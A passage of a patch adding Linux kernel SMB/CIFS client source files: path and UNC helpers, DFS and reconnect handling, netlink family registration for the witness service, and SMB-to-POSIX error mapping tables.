++	if (rqst->rq_npages == 1 || page == rqst->rq_npages-1)
++		*len = rqst->rq_tailsz;
++	else if (page == 0)
++		*len = rqst->rq_pagesz - rqst->rq_offset;
++}
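++
++/*
++ * Illustrative sketch (not part of this patch): walking the page array of
++ * an smb_rqst with the helper above:
++ *
++ *	unsigned int i, len, offset;
++ *
++ *	for (i = 0; i < rqst->rq_npages; i++)
++ *		rqst_page_get_length(rqst, i, &len, &offset);
++ */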
++
++void extract_unc_hostname(const char *unc, const char **h, size_t *len)
++{
++	const char *end;
++
++	/* skip initial slashes */
++	while (*unc && (*unc == '\\' || *unc == '/'))
++		unc++;
++
++	end = unc;
++
++	while (*end && !(*end == '\\' || *end == '/'))
++		end++;
++
++	*h = unc;
++	*len = end - unc;
++}
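++
++/*
++ * Illustrative example (not part of this patch): for unc = "\\srv\share",
++ * *h ends up pointing at "srv\share" and *len is 3 (just the hostname).
++ */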
++
++/**
++ * copy_path_name - copy src path to dst, possibly truncating
++ * @dst: The destination buffer
++ * @src: The source name
++ *
++ * Returns the number of bytes written (including the trailing nul).
++ */
++int copy_path_name(char *dst, const char *src)
++{
++	int name_len;
++
++	/*
++	 * PATH_MAX includes nul, so if strlen(src) >= PATH_MAX it
++	 * will truncate and strlen(dst) will be PATH_MAX-1
++	 */
++	name_len = strscpy(dst, src, PATH_MAX);
++	if (WARN_ON_ONCE(name_len < 0))
++		name_len = PATH_MAX-1;
++
++	/* we count the trailing nul */
++	name_len++;
++	return name_len;
++}
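++
++/*
++ * Illustrative example (not part of this patch): copy_path_name(dst, "\dir")
++ * writes "\dir" plus the trailing nul into dst and returns 5.
++ */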
++
++struct super_cb_data {
++	void *data;
++	struct super_block *sb;
++};
++
++static void tcp_super_cb(struct super_block *sb, void *arg)
++{
++	struct super_cb_data *sd = arg;
++	struct TCP_Server_Info *server = sd->data;
++	struct cifs_sb_info *cifs_sb;
++	struct cifs_tcon *tcon;
++
++	if (sd->sb)
++		return;
++
++	cifs_sb = CIFS_SB(sb);
++	tcon = cifs_sb_master_tcon(cifs_sb);
++	if (tcon->ses->server == server)
++		sd->sb = sb;
++}
++
++static struct super_block *__cifs_get_super(void (*f)(struct super_block *, void *),
++					    void *data)
++{
++	struct super_cb_data sd = {
++		.data = data,
++		.sb = NULL,
++	};
++	struct file_system_type **fs_type = (struct file_system_type *[]) {
++		&cifs_fs_type, &smb3_fs_type, NULL,
++	};
++
++	for (; *fs_type; fs_type++) {
++		iterate_supers_type(*fs_type, f, &sd);
++		if (sd.sb) {
++			/*
++			 * Grab an active reference in order to prevent automounts (DFS links)
++			 * from expiring and then freeing up our cifs superblock pointer while
++			 * we're doing failover.
++			 */
++			cifs_sb_active(sd.sb);
++			return sd.sb;
++		}
++	}
++	return ERR_PTR(-EINVAL);
++}
++
++static void __cifs_put_super(struct super_block *sb)
++{
++	if (!IS_ERR_OR_NULL(sb))
++		cifs_sb_deactive(sb);
++}
++
++struct super_block *cifs_get_tcp_super(struct TCP_Server_Info *server)
++{
++	return __cifs_get_super(tcp_super_cb, server);
++}
++
++void cifs_put_tcp_super(struct super_block *sb)
++{
++	__cifs_put_super(sb);
++}
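++
++/*
++ * Illustrative sketch (not part of this patch): the get/put pair above pins
++ * a superblock across failover, e.g.:
++ *
++ *	struct super_block *sb = cifs_get_tcp_super(server);
++ *
++ *	if (!IS_ERR(sb)) {
++ *		... use sb ...
++ *		cifs_put_tcp_super(sb);
++ *	}
++ */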
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++int match_target_ip(struct TCP_Server_Info *server,
++		    const char *share, size_t share_len,
++		    bool *result)
++{
++	int rc;
++	char *target, *tip = NULL;
++	struct sockaddr tipaddr;
++
++	*result = false;
++
++	target = kzalloc(share_len + 3, GFP_KERNEL);
++	if (!target) {
++		rc = -ENOMEM;
++		goto out;
++	}
++
++	scnprintf(target, share_len + 3, "\\\\%.*s", (int)share_len, share);
++
++	cifs_dbg(FYI, "%s: target name: %s\n", __func__, target + 2);
++
++	rc = dns_resolve_server_name_to_ip(target, &tip, NULL);
++	if (rc < 0)
++		goto out;
++
++	cifs_dbg(FYI, "%s: target ip: %s\n", __func__, tip);
++
++	if (!cifs_convert_address(&tipaddr, tip, strlen(tip))) {
++		cifs_dbg(VFS, "%s: failed to convert target ip address\n",
++			 __func__);
++		rc = -EINVAL;
++		goto out;
++	}
++
++	*result = cifs_match_ipaddr((struct sockaddr *)&server->dstaddr,
++				    &tipaddr);
++	cifs_dbg(FYI, "%s: ip addresses match: %u\n", __func__, *result);
++	rc = 0;
++
++out:
++	kfree(target);
++	kfree(tip);
++
++	return rc;
++}
++
++int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
++{
++	kfree(cifs_sb->prepath);
++
++	if (prefix && *prefix) {
++		cifs_sb->prepath = cifs_sanitize_prepath(prefix, GFP_ATOMIC);
++		if (!cifs_sb->prepath)
++			return -ENOMEM;
++
++		convert_delimiter(cifs_sb->prepath, CIFS_DIR_SEP(cifs_sb));
++	} else
++		cifs_sb->prepath = NULL;
++
++	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
++	return 0;
++}
++
++/*
++ * Handle weird Windows SMB server behaviour. It responds with the
++ * STATUS_OBJECT_NAME_INVALID code to an SMB2 QUERY_INFO request for a
++ * "\<server>\<dfsname>\<linkpath>" DFS reference, where <dfsname> contains
++ * non-ASCII unicode symbols.
++ */
++int cifs_inval_name_dfs_link_error(const unsigned int xid,
++				   struct cifs_tcon *tcon,
++				   struct cifs_sb_info *cifs_sb,
++				   const char *full_path,
++				   bool *islink)
++{
++	struct cifs_ses *ses = tcon->ses;
++	size_t len;
++	char *path;
++	char *ref_path;
++
++	*islink = false;
++
++	/*
++	 * Fast path - skip check when @full_path doesn't have a prefix path to
++	 * look up or tcon is not DFS.
++	 */
++	if (strlen(full_path) < 2 || !cifs_sb ||
++	    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
++	    !is_tcon_dfs(tcon) || !ses->server->origin_fullpath)
++		return 0;
++
++	/*
++	 * Slow path - tcon is DFS and @full_path has prefix path, so attempt
++	 * to get a referral to figure out whether it is a DFS link.
++	 */
++	len = strnlen(tcon->tree_name, MAX_TREE_SIZE + 1) + strlen(full_path) + 1;
++	path = kmalloc(len, GFP_KERNEL);
++	if (!path)
++		return -ENOMEM;
++
++	scnprintf(path, len, "%s%s", tcon->tree_name, full_path);
++	ref_path = dfs_cache_canonical_path(path + 1, cifs_sb->local_nls,
++					    cifs_remap(cifs_sb));
++	kfree(path);
++
++	if (IS_ERR(ref_path)) {
++		if (PTR_ERR(ref_path) != -EINVAL)
++			return PTR_ERR(ref_path);
++	} else {
++		struct dfs_info3_param *refs = NULL;
++		int num_refs = 0;
++
++		/*
++		 * XXX: we are not using dfs_cache_find() here because we might
++		 * end up filling the DFS cache and thus potentially
++		 * removing cached DFS targets that the client would eventually
++		 * need during failover.
++		 */
++		if (ses->server->ops->get_dfs_refer &&
++		    !ses->server->ops->get_dfs_refer(xid, ses, ref_path, &refs,
++						     &num_refs, cifs_sb->local_nls,
++						     cifs_remap(cifs_sb)))
++			*islink = refs[0].server_type == DFS_TYPE_LINK;
++		free_dfs_info_array(refs, num_refs);
++		kfree(ref_path);
++	}
++	return 0;
++}
++#endif
++
++int cifs_wait_for_server_reconnect(struct TCP_Server_Info *server, bool retry)
++{
++	int timeout = 10;
++	int rc;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus != CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		return 0;
++	}
++	timeout *= server->nr_targets;
++	spin_unlock(&server->srv_lock);
++
++	/*
++	 * Give the demultiplex thread up to 10 seconds for each target
++	 * available for reconnect -- this should be greater than the cifs
++	 * socket timeout, which is 7 seconds.
++	 *
++	 * On "soft" mounts we wait once. Hard mounts keep retrying until the
++	 * process is killed or the server comes back online.
++	 */
++	do {
++		rc = wait_event_interruptible_timeout(server->response_q,
++						      (server->tcpStatus != CifsNeedReconnect),
++						      timeout * HZ);
++		if (rc < 0) {
++			cifs_dbg(FYI, "%s: aborting reconnect due to received signal\n",
++				 __func__);
++			return -ERESTARTSYS;
++		}
++
++		/* are we still trying to reconnect? */
++		spin_lock(&server->srv_lock);
++		if (server->tcpStatus != CifsNeedReconnect) {
++			spin_unlock(&server->srv_lock);
++			return 0;
++		}
++		spin_unlock(&server->srv_lock);
++	} while (retry);
++
++	cifs_dbg(FYI, "%s: gave up waiting on reconnect\n", __func__);
++	return -EHOSTDOWN;
++}
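++
++/*
++ * Illustrative sketch (not part of this patch): reconnect-aware callers
++ * typically gate requests on this helper, e.g.:
++ *
++ *	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++ *	if (rc)
++ *		return rc;
++ */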
+diff --git a/fs/smb/client/netlink.c b/fs/smb/client/netlink.c
+new file mode 100644
+index 0000000000000..147d9409252cd
+--- /dev/null
++++ b/fs/smb/client/netlink.c
+@@ -0,0 +1,90 @@
++// SPDX-License-Identifier: GPL-2.0
++/*
++ * Netlink routines for CIFS
++ *
++ * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
++ */
++
++#include <net/genetlink.h>
++#include <uapi/linux/cifs/cifs_netlink.h>
++
++#include "netlink.h"
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "cifs_swn.h"
++
++static const struct nla_policy cifs_genl_policy[CIFS_GENL_ATTR_MAX + 1] = {
++	[CIFS_GENL_ATTR_SWN_REGISTRATION_ID]	= { .type = NLA_U32 },
++	[CIFS_GENL_ATTR_SWN_NET_NAME]		= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_SHARE_NAME]		= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_IP]			= { .len = sizeof(struct sockaddr_storage) },
++	[CIFS_GENL_ATTR_SWN_NET_NAME_NOTIFY]	= { .type = NLA_FLAG },
++	[CIFS_GENL_ATTR_SWN_SHARE_NAME_NOTIFY]	= { .type = NLA_FLAG },
++	[CIFS_GENL_ATTR_SWN_IP_NOTIFY]		= { .type = NLA_FLAG },
++	[CIFS_GENL_ATTR_SWN_KRB_AUTH]		= { .type = NLA_FLAG },
++	[CIFS_GENL_ATTR_SWN_USER_NAME]		= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_PASSWORD]		= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_DOMAIN_NAME]	= { .type = NLA_STRING },
++	[CIFS_GENL_ATTR_SWN_NOTIFICATION_TYPE]	= { .type = NLA_U32 },
++	[CIFS_GENL_ATTR_SWN_RESOURCE_STATE]	= { .type = NLA_U32 },
++	[CIFS_GENL_ATTR_SWN_RESOURCE_NAME]	= { .type = NLA_STRING},
++};
++
++static const struct genl_ops cifs_genl_ops[] = {
++	{
++		.cmd = CIFS_GENL_CMD_SWN_NOTIFY,
++		.validate = GENL_DONT_VALIDATE_STRICT | GENL_DONT_VALIDATE_DUMP,
++		.doit = cifs_swn_notify,
++	},
++};
++
++static const struct genl_multicast_group cifs_genl_mcgrps[] = {
++	[CIFS_GENL_MCGRP_SWN] = { .name = CIFS_GENL_MCGRP_SWN_NAME },
++};
++
++struct genl_family cifs_genl_family = {
++	.name		= CIFS_GENL_NAME,
++	.version	= CIFS_GENL_VERSION,
++	.hdrsize	= 0,
++	.maxattr	= CIFS_GENL_ATTR_MAX,
++	.module		= THIS_MODULE,
++	.policy		= cifs_genl_policy,
++	.ops		= cifs_genl_ops,
++	.n_ops		= ARRAY_SIZE(cifs_genl_ops),
++	.resv_start_op	= CIFS_GENL_CMD_SWN_NOTIFY + 1,
++	.mcgrps		= cifs_genl_mcgrps,
++	.n_mcgrps	= ARRAY_SIZE(cifs_genl_mcgrps),
++};
++
++/**
++ * cifs_genl_init - Register generic netlink family
++ *
++ * Return zero if initialized successfully, otherwise non-zero.
++ */
++int cifs_genl_init(void)
++{
++	int ret;
++
++	ret = genl_register_family(&cifs_genl_family);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: failed to register netlink family\n",
++				__func__);
++		return ret;
++	}
++
++	return 0;
++}
++
++/**
++ * cifs_genl_exit - Unregister generic netlink family
++ */
++void cifs_genl_exit(void)
++{
++	int ret;
++
++	ret = genl_unregister_family(&cifs_genl_family);
++	if (ret < 0) {
++		cifs_dbg(VFS, "%s: failed to unregister netlink family\n",
++				__func__);
++	}
++}
+diff --git a/fs/smb/client/netlink.h b/fs/smb/client/netlink.h
+new file mode 100644
+index 0000000000000..e2fa8ed24c546
+--- /dev/null
++++ b/fs/smb/client/netlink.h
+@@ -0,0 +1,16 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/*
++ * Netlink routines for CIFS
++ *
++ * Copyright (c) 2020 Samuel Cabrero <scabrero@suse.de>
++ */
++
++#ifndef _CIFS_NETLINK_H
++#define _CIFS_NETLINK_H
++
++extern struct genl_family cifs_genl_family;
++
++extern int cifs_genl_init(void);
++extern void cifs_genl_exit(void);
++
++#endif /* _CIFS_NETLINK_H */
+diff --git a/fs/smb/client/netmisc.c b/fs/smb/client/netmisc.c
+new file mode 100644
+index 0000000000000..1b52e6ac431cb
+--- /dev/null
++++ b/fs/smb/client/netmisc.c
+@@ -0,0 +1,1021 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ *   Error mapping routines from Samba libsmb/errormap.c
++ *   Copyright (C) Andrew Tridgell 2001
++ */
++
++#include <linux/net.h>
++#include <linux/string.h>
++#include <linux/in.h>
++#include <linux/ctype.h>
++#include <linux/fs.h>
++#include <asm/div64.h>
++#include <asm/byteorder.h>
++#include <linux/inet.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smberr.h"
++#include "cifs_debug.h"
++#include "nterr.h"
++
++struct smb_to_posix_error {
++	__u16 smb_err;
++	int posix_code;
++};
++
++static const struct smb_to_posix_error mapping_table_ERRDOS[] = {
++	{ERRbadfunc, -EINVAL},
++	{ERRbadfile, -ENOENT},
++	{ERRbadpath, -ENOTDIR},
++	{ERRnofids, -EMFILE},
++	{ERRnoaccess, -EACCES},
++	{ERRbadfid, -EBADF},
++	{ERRbadmcb, -EIO},
++	{ERRnomem, -EREMOTEIO},
++	{ERRbadmem, -EFAULT},
++	{ERRbadenv, -EFAULT},
++	{ERRbadformat, -EINVAL},
++	{ERRbadaccess, -EACCES},
++	{ERRbaddata, -EIO},
++	{ERRbaddrive, -ENXIO},
++	{ERRremcd, -EACCES},
++	{ERRdiffdevice, -EXDEV},
++	{ERRnofiles, -ENOENT},
++	{ERRwriteprot, -EROFS},
++	{ERRbadshare, -EBUSY},
++	{ERRlock, -EACCES},
++	{ERRunsup, -EINVAL},
++	{ERRnosuchshare, -ENXIO},
++	{ERRfilexists, -EEXIST},
++	{ERRinvparm, -EINVAL},
++	{ERRdiskfull, -ENOSPC},
++	{ERRinvname, -ENOENT},
++	{ERRinvlevel, -EOPNOTSUPP},
++	{ERRdirnotempty, -ENOTEMPTY},
++	{ERRnotlocked, -ENOLCK},
++	{ERRcancelviolation, -ENOLCK},
++	{ERRalreadyexists, -EEXIST},
++	{ERRmoredata, -EOVERFLOW},
++	{ERReasnotsupported, -EOPNOTSUPP},
++	{ErrQuota, -EDQUOT},
++	{ErrNotALink, -ENOLINK},
++	{ERRnetlogonNotStarted, -ENOPROTOOPT},
++	{ERRsymlink, -EOPNOTSUPP},
++	{ErrTooManyLinks, -EMLINK},
++	{0, 0}
++};
++
++static const struct smb_to_posix_error mapping_table_ERRSRV[] = {
++	{ERRerror, -EIO},
++	{ERRbadpw, -EACCES},  /* was EPERM */
++	{ERRbadtype, -EREMOTE},
++	{ERRaccess, -EACCES},
++	{ERRinvtid, -ENXIO},
++	{ERRinvnetname, -ENXIO},
++	{ERRinvdevice, -ENXIO},
++	{ERRqfull, -ENOSPC},
++	{ERRqtoobig, -ENOSPC},
++	{ERRqeof, -EIO},
++	{ERRinvpfid, -EBADF},
++	{ERRsmbcmd, -EBADRQC},
++	{ERRsrverror, -EIO},
++	{ERRbadBID, -EIO},
++	{ERRfilespecs, -EINVAL},
++	{ERRbadLink, -EIO},
++	{ERRbadpermits, -EINVAL},
++	{ERRbadPID, -ESRCH},
++	{ERRsetattrmode, -EINVAL},
++	{ERRpaused, -EHOSTDOWN},
++	{ERRmsgoff, -EHOSTDOWN},
++	{ERRnoroom, -ENOSPC},
++	{ERRrmuns, -EUSERS},
++	{ERRtimeout, -ETIME},
++	{ERRnoresource, -EREMOTEIO},
++	{ERRtoomanyuids, -EUSERS},
++	{ERRbaduid, -EACCES},
++	{ERRusempx, -EIO},
++	{ERRusestd, -EIO},
++	{ERR_NOTIFY_ENUM_DIR, -ENOBUFS},
++	{ERRnoSuchUser, -EACCES},
++/*	{ERRaccountexpired, -EACCES},
++	{ERRbadclient, -EACCES},
++	{ERRbadLogonTime, -EACCES},
++	{ERRpasswordExpired, -EACCES},*/
++	{ERRaccountexpired, -EKEYEXPIRED},
++	{ERRbadclient, -EACCES},
++	{ERRbadLogonTime, -EACCES},
++	{ERRpasswordExpired, -EKEYEXPIRED},
++
++	{ERRnosupport, -EINVAL},
++	{0, 0}
++};
++
++/*
++ * Convert a string containing text IPv4 or IPv6 address to binary form.
++ *
++ * Returns 0 on failure.
++ */
++static int
++cifs_inet_pton(const int address_family, const char *cp, int len, void *dst)
++{
++	int ret = 0;
++
++	/* parsing ends at the first '\\' (UNC delimiter) or after len bytes */
++	if (address_family == AF_INET)
++		ret = in4_pton(cp, len, dst, '\\', NULL);
++	else if (address_family == AF_INET6)
++		ret = in6_pton(cp, len, dst , '\\', NULL);
++
++	cifs_dbg(NOISY, "address conversion returned %d for %*.*s\n",
++		 ret, len, len, cp);
++	if (ret > 0)
++		ret = 1;
++	return ret;
++}
++
++/*
++ * Try to convert a string to an IPv4 address and then attempt to convert
++ * it to an IPv6 address if that fails. Set the family field if either
++ * succeeds. If it's an IPv6 address and it has a '%' sign in it, try to
++ * treat the part following it as a numeric sin6_scope_id.
++ *
++ * Returns 0 on failure.
++ */
++int
++cifs_convert_address(struct sockaddr *dst, const char *src, int len)
++{
++	int rc, alen, slen;
++	const char *pct;
++	char scope_id[13];
++	struct sockaddr_in *s4 = (struct sockaddr_in *) dst;
++	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *) dst;
++
++	/* IPv4 address */
++	if (cifs_inet_pton(AF_INET, src, len, &s4->sin_addr.s_addr)) {
++		s4->sin_family = AF_INET;
++		return 1;
++	}
++
++	/* attempt to exclude the scope ID from the address part */
++	pct = memchr(src, '%', len);
++	alen = pct ? pct - src : len;
++
++	rc = cifs_inet_pton(AF_INET6, src, alen, &s6->sin6_addr.s6_addr);
++	if (!rc)
++		return rc;
++
++	s6->sin6_family = AF_INET6;
++	if (pct) {
++		/* grab the scope ID */
++		slen = len - (alen + 1);
++		if (slen <= 0 || slen > 12)
++			return 0;
++		memcpy(scope_id, pct + 1, slen);
++		scope_id[slen] = '\0';
++
++		rc = kstrtouint(scope_id, 0, &s6->sin6_scope_id);
++		rc = (rc == 0) ? 1 : 0;
++	}
++
++	return rc;
++}
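++
++/*
++ * Illustrative examples (not part of this patch): "192.168.0.1" parses as
++ * IPv4; "fe80::1%2" parses as IPv6 with sin6_scope_id set to 2.
++ */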
++
++void
++cifs_set_port(struct sockaddr *addr, const unsigned short int port)
++{
++	switch (addr->sa_family) {
++	case AF_INET:
++		((struct sockaddr_in *)addr)->sin_port = htons(port);
++		break;
++	case AF_INET6:
++		((struct sockaddr_in6 *)addr)->sin6_port = htons(port);
++		break;
++	}
++}
++
++/*****************************************************************************
++convert an NT status code to a DOS class/code
++ *****************************************************************************/
++/* NT status -> dos error map */
++static const struct {
++	__u8 dos_class;
++	__u16 dos_code;
++	__u32 ntstatus;
++} ntstatus_to_dos_map[] = {
++	{
++	ERRDOS, ERRgeneral, NT_STATUS_UNSUCCESSFUL}, {
++	ERRDOS, ERRbadfunc, NT_STATUS_NOT_IMPLEMENTED}, {
++	ERRDOS, ERRinvlevel, NT_STATUS_INVALID_INFO_CLASS}, {
++	ERRDOS, 24, NT_STATUS_INFO_LENGTH_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ACCESS_VIOLATION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_IN_PAGE_ERROR}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PAGEFILE_QUOTA}, {
++	ERRDOS, ERRbadfid, NT_STATUS_INVALID_HANDLE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_INITIAL_STACK}, {
++	ERRDOS, 193, NT_STATUS_BAD_INITIAL_PC}, {
++	ERRDOS, 87, NT_STATUS_INVALID_CID}, {
++	ERRHRD, ERRgeneral, NT_STATUS_TIMER_NOT_CANCELED}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER}, {
++	ERRDOS, ERRbadfile, NT_STATUS_NO_SUCH_DEVICE}, {
++	ERRDOS, ERRbadfile, NT_STATUS_NO_SUCH_FILE}, {
++	ERRDOS, ERRbadfunc, NT_STATUS_INVALID_DEVICE_REQUEST}, {
++	ERRDOS, 38, NT_STATUS_END_OF_FILE}, {
++	ERRDOS, 34, NT_STATUS_WRONG_VOLUME}, {
++	ERRDOS, 21, NT_STATUS_NO_MEDIA_IN_DEVICE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNRECOGNIZED_MEDIA}, {
++	ERRDOS, 27, NT_STATUS_NONEXISTENT_SECTOR},
++/*	{ This NT error code was 'squashed'
++	 from NT_STATUS_MORE_PROCESSING_REQUIRED to NT_STATUS_OK
++	 during the session setup } */
++	{
++	ERRDOS, ERRnomem, NT_STATUS_NO_MEMORY}, {
++	ERRDOS, 487, NT_STATUS_CONFLICTING_ADDRESSES}, {
++	ERRDOS, 487, NT_STATUS_NOT_MAPPED_VIEW}, {
++	ERRDOS, 87, NT_STATUS_UNABLE_TO_FREE_VM}, {
++	ERRDOS, 87, NT_STATUS_UNABLE_TO_DELETE_SECTION}, {
++	ERRDOS, 2142, NT_STATUS_INVALID_SYSTEM_SERVICE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILLEGAL_INSTRUCTION}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_INVALID_LOCK_SEQUENCE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_INVALID_VIEW_SIZE}, {
++	ERRDOS, 193, NT_STATUS_INVALID_FILE_FOR_SECTION}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_ALREADY_COMMITTED},
++/*	{ This NT error code was 'squashed'
++	 from NT_STATUS_ACCESS_DENIED to NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE
++	 during the session setup }   */
++	{
++	ERRDOS, ERRnoaccess, NT_STATUS_ACCESS_DENIED}, {
++	ERRDOS, 111, NT_STATUS_BUFFER_TOO_SMALL}, {
++	ERRDOS, ERRbadfid, NT_STATUS_OBJECT_TYPE_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NONCONTINUABLE_EXCEPTION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_DISPOSITION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNWIND}, {
++	ERRHRD, ERRgeneral, NT_STATUS_BAD_STACK}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_UNWIND_TARGET}, {
++	ERRDOS, 158, NT_STATUS_NOT_LOCKED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PARITY_ERROR}, {
++	ERRDOS, 487, NT_STATUS_UNABLE_TO_DECOMMIT_VM}, {
++	ERRDOS, 487, NT_STATUS_NOT_COMMITTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PORT_ATTRIBUTES}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PORT_MESSAGE_TOO_LONG}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PARAMETER_MIX}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_QUOTA_LOWER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DISK_CORRUPT_ERROR}, {
++	 /* mapping changed since the shell does a lookup on "*" and expects FileNotFound */
++	ERRDOS, ERRbadfile, NT_STATUS_OBJECT_NAME_INVALID}, {
++	ERRDOS, ERRbadfile, NT_STATUS_OBJECT_NAME_NOT_FOUND}, {
++	ERRDOS, ERRalreadyexists, NT_STATUS_OBJECT_NAME_COLLISION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_HANDLE_NOT_WAITABLE}, {
++	ERRDOS, ERRbadfid, NT_STATUS_PORT_DISCONNECTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DEVICE_ALREADY_ATTACHED}, {
++	ERRDOS, 161, NT_STATUS_OBJECT_PATH_INVALID}, {
++	ERRDOS, ERRbadpath, NT_STATUS_OBJECT_PATH_NOT_FOUND}, {
++	ERRDOS, 161, NT_STATUS_OBJECT_PATH_SYNTAX_BAD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DATA_OVERRUN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_DATA_LATE_ERROR}, {
++	ERRDOS, 23, NT_STATUS_DATA_ERROR}, {
++	ERRDOS, 23, NT_STATUS_CRC_ERROR}, {
++	ERRDOS, ERRnomem, NT_STATUS_SECTION_TOO_BIG}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_PORT_CONNECTION_REFUSED}, {
++	ERRDOS, ERRbadfid, NT_STATUS_INVALID_PORT_HANDLE}, {
++	ERRDOS, ERRbadshare, NT_STATUS_SHARING_VIOLATION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_QUOTA_EXCEEDED}, {
++	ERRDOS, 87, NT_STATUS_INVALID_PAGE_PROTECTION}, {
++	ERRDOS, 288, NT_STATUS_MUTANT_NOT_OWNED}, {
++	ERRDOS, 298, NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED}, {
++	ERRDOS, 87, NT_STATUS_PORT_ALREADY_SET}, {
++	ERRDOS, 87, NT_STATUS_SECTION_NOT_IMAGE}, {
++	ERRDOS, 156, NT_STATUS_SUSPEND_COUNT_EXCEEDED}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_THREAD_IS_TERMINATING}, {
++	ERRDOS, 87, NT_STATUS_BAD_WORKING_SET_LIMIT}, {
++	ERRDOS, 87, NT_STATUS_INCOMPATIBLE_FILE_MAP}, {
++	ERRDOS, 87, NT_STATUS_SECTION_PROTECTION}, {
++	ERRDOS, ERReasnotsupported, NT_STATUS_EAS_NOT_SUPPORTED}, {
++	ERRDOS, 255, NT_STATUS_EA_TOO_LARGE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NONEXISTENT_EA_ENTRY}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_EAS_ON_FILE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_EA_CORRUPT_ERROR}, {
++	ERRDOS, ERRlock, NT_STATUS_FILE_LOCK_CONFLICT}, {
++	ERRDOS, ERRlock, NT_STATUS_LOCK_NOT_GRANTED}, {
++	ERRDOS, ERRbadfile, NT_STATUS_DELETE_PENDING}, {
++	ERRDOS, ERRunsup, NT_STATUS_CTL_FILE_NOT_SUPPORTED}, {
++	ERRHRD, ERRgeneral, NT_STATUS_UNKNOWN_REVISION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_REVISION_MISMATCH}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_OWNER}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_PRIMARY_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_IMPERSONATION_TOKEN}, {
++	ERRHRD, ERRgeneral, NT_STATUS_CANT_DISABLE_MANDATORY}, {
++	ERRDOS, 2215, NT_STATUS_NO_LOGON_SERVERS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_LOGON_SESSION}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_PRIVILEGE}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_PRIVILEGE_NOT_HELD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_INVALID_ACCOUNT_NAME}, {
++	ERRHRD, ERRgeneral, NT_STATUS_USER_EXISTS},
++/*	{ This NT error code was 'squashed'
++	 from NT_STATUS_NO_SUCH_USER to NT_STATUS_LOGON_FAILURE
++	 during the session setup } */
++	{
++	ERRDOS, ERRnoaccess, NT_STATUS_NO_SUCH_USER}, { /* could map to 2238 */
++	ERRHRD, ERRgeneral, NT_STATUS_GROUP_EXISTS}, {
++	ERRHRD, ERRgeneral, NT_STATUS_NO_SUCH_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_IN_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_MEMBER_NOT_IN_GROUP}, {
++	ERRHRD, ERRgeneral, NT_STATUS_LAST_ADMIN},
++/*	{ This NT error code was 'squashed'
++	 from NT_STATUS_WRONG_PASSWORD to NT_STATUS_LOGON_FAILURE
++	 during the session setup } */
++	{
++	ERRSRV, ERRbadpw, NT_STATUS_WRONG_PASSWORD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ILL_FORMED_PASSWORD}, {
++	ERRHRD, ERRgeneral, NT_STATUS_PASSWORD_RESTRICTION}, {
++	ERRDOS, ERRnoaccess, NT_STATUS_LOGON_FAILURE}, {
++	ERRHRD, ERRgeneral, NT_STATUS_ACCOUNT_RESTRICTION}, {
++	ERRSRV, ERRbadLogonTime, NT_STATUS_INVALID_LOGON_HOURS}, {
